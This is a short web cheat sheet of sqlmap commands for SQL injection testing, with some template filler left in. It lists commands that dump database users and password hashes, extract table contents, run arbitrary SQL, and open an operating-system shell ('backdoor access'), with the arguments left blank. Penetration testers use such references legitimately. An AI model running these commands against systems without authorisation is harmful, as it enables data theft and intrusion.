SQLMAP Commands Cheat Sheet
Here is a cli commands cheat sheet for SQLMAP command, you can use this as a quick reminder for basic commands with a brief description for each of the commands.
What is SQLMAP command?
Add some data here
---
tags: [ database ]
---
# Test URL and POST data and return database banner (if possible)
./sqlmap.py --url="" --data="" --banner
# Parse request data and test | request data can be obtained with burp
./sqlmap.py -r
# Fingerprint | much more information than banner
./sqlmap.py -r --fingerprint
# Get database username, name, and hostname
./sqlmap.py -r --current-user --current-db --hostname
# Check if user is a database admin
./sqlmap.py -r --is-dba
# Get database users and password hashes
./sqlmap.py -r --users --passwords
# Enumerate databases
./sqlmap.py -r --dbs
# List tables for one database
./sqlmap.py -r -D --tables
# Other database commands
./sqlmap.py -r -D --columns
--schema
--count
# Enumeration flags
./sqlmap.py -r -D
-T
-C
-U
# Extract data
./sqlmap.py -r -D -T -C --dump
# Execute SQL Query
./sqlmap.py -r --sql-query=""
# Append/Prepend SQL Queries
./sqlmap.py -r --prefix="" --suffix=""
# Get backdoor access to sql server | can give shell access
./sqlmap.py -r --os-shell
Check out the SQLMAP command documentation .
You can also check our MegaSh cheatsheet tool, that has 150+ searchable linux cheat sheets in one page, so you never forget a command as you work again
Check Also
